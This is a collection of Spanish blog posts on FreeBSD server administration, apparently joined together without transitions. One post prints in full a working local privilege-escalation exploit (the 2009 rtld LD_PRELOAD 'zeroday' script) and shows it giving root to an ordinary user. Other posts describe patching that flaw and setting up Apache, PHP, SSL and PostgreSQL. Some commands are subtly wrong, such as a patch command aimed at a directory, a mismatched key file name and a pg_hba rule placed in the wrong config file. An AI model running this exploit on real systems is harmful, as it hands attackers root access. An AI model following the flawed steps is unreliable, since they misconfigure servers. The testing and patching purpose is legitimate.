Después de reparar manualmente la vulnerabilidad del rtld, se me ocurrió investigar un poco acerca de como actualizar FreeBSD (ojalá a través de sus canales estándar) de manera que se solucione el problema y de paso mantener al día el sistema operativo de otras vulnerabilidades que uno no necesariamente se de por enterado, es decir, algo similar al apt-get/aptitude safe-upgrade de Debian/Ubuntu y similares.

Actualización de seguridad.

Este método descarga e instala los últimos parches de seguridad existentes para la distribución.

# freebsd-update fetch

# freebsd-update install

En términos de la vulnerabilidad que nos ocupa el resultado es el mismo del procedimiento anterior: el exploit ya no es funcional porque la vulnerabilidad ha sido reparada, además de algunas otras adicionales.

Enlaces.

• FreeBSD Update - Security Patches.
  http://www.freebsd.org/doc/en/books/handbook/updating-freebsdupdate.html

Hace un par de días instalé un FreeBSD 8.0 para probar el exploit de día cero que se aprovechaba de una vulnerabilidad del rtld con el cual un usuario local obtiene fácilmente los privilegios de administrador o root.

Un ataque o amenaza de día cero o zero day significa que se aprovecha de una vulnerabilidad del sistema que ha sido descubierta en lo salvaje pero que aún no ha sido conocida por el desarrollador o aún no se ha publicado una solución para la misma, haciendo a este tipo de exploits muy graves para los usuarios.

Hoy volví a revisar el tema buscando que soluciones se le habían dado y encontré que se ha liberado un parche para solucionar este problema.  A continuación describo los pasos que seguí para la instalación del parche.

Instalación del parche.

Requerimientos.

Es necesario contar con las fuentes de los paquetes libexec y lib.  Estas se pueden instalar fácilmente desde el CDROM de la instalación base utilizando la aplicación sysinstall.  Para mayor información consultar este artículo.

Procedimiento.

# mkdir /root/parche && cd /root/parche

# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch

# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc

# cd /usr/src

# patch < /root/parche

# cd /usr/src/libexec/rtld-elf

# make obj && make depend && make && make install

# reboot

Prueba.

Después de reiniciar el servidor, ingresé nuevamente como un usuario sin privilegios e intenté ejecutar el exploit de la misma manera como se hizo anteriormente.  La ejecución falló y obtuve un resultado completamente distinto después de la instalación del parche.

Enlaces.

• FreeBSD Security Advisory FreeBSD-SA-09:16.rtld.
  http://lists.freebsd.org/pipermail/freebsd-security/2009-December/005416.html
• How do I install FreeBSD kernel source code?
  http://www.cyberciti.biz/faq/freebsd-install-kernel-source-code/

El día de ayer me enteré que habían descubierto una vulnerabilidad en FreeBSD, mas específicamente en editor de enlace en tiempo real (rtld) que le permite a cualquier usuario local convertirse en root.

Este fallo afecta a las versiones 7.1 y 8 (Amnesiac) de FreeBSD.

La presente es una prueba, rápida y sencilla del exploit para ver como funcionaba.

Instalación.

Descargué la imagen ISO del disco #1 de FreeBSD versión 8 del siguiente enlace.

ftp://ftp.freebsd.org/pub/FreeBSD/releases/i386/ISO-IMAGES/8.0/

En el momento de instalarlo es necesario incluír el soporte para el desarrollo de aplicaciones en C ya que es necesario compilar y enlazar un pequeño programa con gcc.

Ejecución.

Ingrese como un usuario sin privilegios en el sistema, en mi caso, el usuario jimezam el cual ni siquiera puede intentar convertirse en root mediante la invocación a su.

Cree u obtenga el archivo w00t.sh con el código fuente del exploit, dispuesto a continuación.

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>
main() {
 extern char **environ;
 environ = (char**)malloc(8096);
 environ[0] = (char*)malloc(1024);
 environ[1] = (char*)malloc(1024);
 strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
 execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
 extern char **environ;
 environ=NULL;
 system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Modifique su permiso de ejecución.

$ chmod +x w00t.sh

Invoque el script.

Note como el usuario propietario de la sesión ha obtenido privilegios de administrador.

El bug ha sido entonces exitosamente explotado.

Enlaces.

• FreeBSD local r00t zeroday.
  http://seclists.org/fulldisclosure/2009/Nov/371
• FreeBSD - The power to serve.
  http://www.freebsd.org/

# cd /usr/ports/lang/python
# make install clean

    THREADS
    UCS4
    PYMALLOC
    IPV6

# python -V

    Python 2.5.2

Instalación de mod_python.

# cd /usr/ports/lang/mod_python3

# make install clean

Configuración de Apache con mod_python.

# vi /usr/local/etc/apache22/httpd.conf

    LoadModule python_module libexec/apache22/mod_python.so
    PythonOption mod_python.mutex_directory "/tmp"
    PythonOption mod_python.mutex_locks 8

    <Directory "/home/web">
        AddHandler mod_python .py
        PythonHandler pythontest
        PythonDebug On
    </Directory>

Recuérdese que el DOCUMENT_ROOT del servidor es “/home/web“.

A continuación se creará el siguiente archivo ubicado en /home/web/pythontest.py para verificar el funcionamiento del módulo.

# vi /home/web/pythontest.py

from mod_python import apache
import datetime
def handler(req):
    today = datetime.date.today()
    req.content_type = "text/plain"
    req.write("Hello, today is " + str(today.day) + "/" + str(today.month) + "/" + str(today.year) + ".")
    return apache.OK

Si se consulta el sitio http://webserver.mydomain.com/pythontest.py deberá obtenerse una respuesta similar a la mostrada a continuación.

    Hello, today is 27/5/2008.

Si se intenta ejecutar cualquier otro programa .py ubicado en el mismo directorio (/home/web) se obtendrá siempre la misma respuesta ya que en la configuración de Apache se especificó que ese archivo (pythontest.py) sería quien manipulase los archivos Python en ese directorio. Para permitir el acceso de otros programas desde la misma ubicación se deberán utilizar manipuladores (handlers) especiales como mod_python.Publisher, mpservlets o Vampire.

Enalces.

• Lenguaje de programación Python.
• mod_python.
• Instalación de mod_python (documentación en general).

# make install clean

# vi /usr/local/etc/apache22/httpd.conf

LoadFile /usr/local/lib/libxml2.so
LoadModule mod_security2    libexec/apache22/mod_security2.so
<IfModule security2_module>
    SecRuleEngine On
</IfModule>

# /usr/local/etc/rc.d/apache22 restart

Nota: la instalación con la versión 2.1.3 no se pudo realizar ya que el Makefile no realizaba correctamente el enlace con libxml2 y fallaban las reglas que requerían procesamiento de XML. Se recomienda actualizar a una versión superior.

El siguiente paso consiste en configurar las reglas de seguridad que apliquen a su negocio. Para esto edite apropiadamente los siguientes archivos bajo la ruta /usr/local/etc/apache22/Includes.

• mod_security2.conf
• no-accf.conf
• mod_security2/ (directorio de reglas)

Enlaces

• Manual de referencia (documentación).
• Reglas de GotRoot.

Port 22
Protocol 2
SyslogFacility AUTH
LogLevel INFO
LoginGraceTime 2m
PermitRootLogin no
Subsystem    sftp    /usr/libexec/sftp-server

# /etc/rc.d/sshd restart

# cd /usr/ports/www/mod_fcgid

# make install clean

Verificar que la instalación de PHP cuente con el soporte de FastCGI.

# /usr/local/bin/php-cgi -v

Configurar a Apache para que utilice el nuevo módulo de FCGI.

# vi /usr/local/etc/apache22/httpd.conf

Agregar al final del archivo httpd.conf.

LoadModule fcgid_module libexec/apache22/mod_fcgid.so
<IfModule mod_fcgid.c>
    AddHandler fcgid-script .fcgi
    FCGIWrapper /usr/local/bin/php-cgi .php
</IfModule>

Ubicar la sección del directorio del DOCUMENT_ROOT y complementarla con la nueva opción.

<Directory "/home/web">
    # ...
    Options ExecCGI
</Directory>

Reiniciar el servicio de Apache para que se tengan en cuenta los cambios realizados.

# /usr/local/etc/rc.d/apache22 restart

Consultar la salida de phpinfo() para verificar su correcto funcionamiento.

# cd /usr/ports/lang/php5
# make config

CLI
CGI
SUHOSIN
MULTIBYTE
IPV6
FASTCGI
PATHINFO

# make install clean

Compilar e instalar las extensiones de PHP que se consideren necesarias. El sistema de ports descargará e instalará cualquier paquete adicional que se requiera como dependencia de las extensiones elegidas.

# cd /usr/ports/lang/php5-extensions

# make config

BCMATH
BZ2
CALENDAR
CTYPE
CURL
DOM
EXIF
FILTER
FTP
GD
GETTEXT
HASH
ICONV
IMAP
JSON
LDAP
MBSTRING
MCRYPT
MHASH
MING
MSSQL
MYSQL
MYSQLI
NCURSES
ODBC
OPENSSL
PCRE
PDF
PDO
PDO_SQLITE
PGSQL
POSIX
READLINE
SESSION
SIMPLE_XML
SOAP
SOCKETS
SPL
SQLITE
TIDY
TOKENIZER
WDDX
XML
XMLREADER
XMLRPC
XMLWRITER
XSL
ZIP
ZLIB

# make install clean

Modificar el archivo de configuración de Apache (httpd.conf) para especificar como manejar los archivos con la extensión .php.

# vi /usr/local/etc/apache22/httpd.conf

<IfModule dir_module>
    DirectoryIndex index.php index.html index.htm
</IfModule>

Agregar al final de httpd.conf.

ScriptAlias /php-cgi "/usr/local/bin/php-cgi"
AddHandler php-handler .php
Action php-handler /php-cgi
<Location "/php-cgi">
    Options None
    Order allow,deny
    Allow from all
</Location>

Crear un archivo de configuración de PHP (php.ini) a partir de los archivos base incluídos en la distribución (dist para desarrolladores o recommended para ambientes en producción).

# cp /usr/local/etc/php.ini-recommended /usr/local/etc/php.ini
# vi /usr/local/etc/php.ini

(Quitar el comentario)

session.save_path = "/tmp"

Crear un archivo de prueba para verificar el funcionamiento del CGI de PHP recién instalado.

# vi /home/web/test.php

    <?php echo phpinfo (); ?>

Consultar la dirección del servidor (http://webserver.mydomain.com/test.php) con un navegador web. Si la instalación fue exitosa se deberá visualizar una página similar a la mostrada a continuación.

# vi /etc/rc.conf

apache2_flags="-DSSL"

Se establecen las ubicaciones donde se creará el certificado SSL.

# cd /usr/local/etc/apache22

# mkdir ssl.key

# mkdir ssl.crt

# chmod 0700 ssl.key

# chmod 0700 ssl.crt

Se crea el certificado SSL del servidor. Se deberán tener en cuenta las recomendaciones mencionadas en el artículo de soporte SSL para PGSQL. En particular, se deberá reemplazar la contraseña (MyPassPhrase) por una propia y privada.

# openssl genrsa -des3 -out server.key 1024

Enter pass phrase for server.key: MyPassPhrase

Solicitud de firma del certificado: Certificate Signing Request (CSR).

# openssl req -new -key server.key -out server.csr

Enter pass phrase for server.key: MyPassPhrase
Verifying - Enter PEM pass phrase: MyPassPhrase
Country Name (2 letter code) [AU]: CO
State or Province Name (full name) [Some-State]: Caldas
Locality Name (eg, city) []: Manizales
Organization Name (eg, company) [Internet Widgits Pty Ltd]:  Personal Development
Organizational Unit Name (eg, section) []: Educacion
Common Name (eg, YOUR name) []: webserver.mydomain.com
Email Address []:jimezam@gmail.com
A challenge password []: Certificado&2008k
An optional company name []: Smiley World

Realización de la autofirma del certificado.

# openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
Enter pass phrase for server.key: MyPassPhrase

Ubicación de los certificados en sus ubicaciones finales.

# rm server.csr

# mv server.key ssl.key
# mv server.crt ssl.crt

# chmod 0400 ssl.key/server.key
# chmod 0400 ssl.crt/server.crt

Configuración de Apache para activar el módulo de SSL.

# vi /usr/local/etc/apache22/extra/httpd-ssl.conf

<VirtualHost _default_:443>
    DocumentRoot "/home/web"
    ServerName webserver.mydomain.com:443
    ServerAdmin jimezam@gmail.com
    ErrorLog /var/log/ssl-error.log
    TransferLog /var/log/ssl-access.log
    SSLCertificateFile "/usr/local/etc/apache22/ssl.crt/server.crt"
    SSLCertificateKeyFile "/usr/local/etc/apache22/ssl.key/server.key"
</VirtualHost>

# vi /usr/local/etc/apache22/httpd.conf

Include etc/apache22/extra/httpd-ssl.conf

Reiniciar el servicio de Apache.

# /usr/local/etc/rc.d/apache22 restart

Enter pass phrase: MyPassPhrase

Realizar la verificación de su funcionamiento consultando las siguientes direcciones web.

• http://webserver.mydomain.com
• https://webserver.mydomain.com

Cada vez que se inicie el servicio, como en el paso anterior, se solicitará la clave asignada. Esta característica fue diseñada por razones de seguridad, es necesaria ya que la llave RSA privada del archivo server.key se encuentra encriptada con ella, sin embargo es posible removerla bajo consideración del administrador. Para remover esta capa de seguridad se deben ejecutar los pasos siguientes.

# cd /usr/local/etc/apache22/ssl.key

# cp server.key server.key.orig

# openssl rsa -in server.key.org -out server.key

Enter pass phrase for server.key.orig: MyPassPhrase

# /usr/local/etc/rc.d/apache22 restart

Enlaces:

• SSL/TLS Strong Encryption: FAQ.

Por defecto PostgreSQL permite que las conexiones al motor de bases de datos que se realizan de manera local se hagan sin autenticación, lo cual es poco recomendable. Este comportamiento puede modificarse siguiendo los pasos dispuestos a continuación.

# vi /usr/local/pgsql/data/pg_hba.conf

Modificamos el método pasándolo de trust a md5 para los orígenes de conexión que nos interese asegurar. El siguiente es el nuevo contenido del archivo tomando en cuenta las modificaciones realizadas para activar el soporte de SSL.

local      all    all                      md5
hostssl    all    all    127.0.0.1/32      md5
hostssl    all    all    ::1/128           md5

Habilitar el acceso a las bases de datos a través de TCP/IP.

Nuevamente, por defecto PostgreSQL no permite la realización de conexiones cuya petición provenga de un equipo externo, es decir, diferente de localhost. Para habilitar esto se deberán seguir los pasos a continuación.

Es posible autorizar las conexiones desde orígenes externos nombrados, es decir, especificar con precisión desde cuales direcciones IP se habilitarán las conexiones remotas enunciándolas separadas por espacio en la variable listen_address (reemplazando el asterisco = todos).

# vi /usr/local/pgsql/data/postgres.conf

listen_addresses='*'

Debe tenerse en cuenta que además de permitir las conexiones desde una dirección IP específica (o varias), es necesario especificar el tipo de autenticación para ese equipo/red como se realizó en la sección anterior para localhost. Para permitir conexiones entrantes con soporte para SSL (hostssl), a cualquier base de datos (primer all), de cualquier usuario (segundo all) desde cualquier equipo de la red 192.168.1.x (192.168.0.0/24) utilizando contraseñas encriptadas con MD5 se deberá realizar el siguiente procedimiento.

# vi /usr/local/pgsql/data/postgres.conf

hostssl all all 192.168.1.0/24 md5

Para ajustar una mayor granularidad en la seguridad de conexión se deberán personalizar estos valores a sus requerimientos individuales.

Es necesario reiniciar el servicio para que se tomen en cuenta las modificaciones a la configuración recién realizadas.

Enlaces:

• The pg_hba.conf file.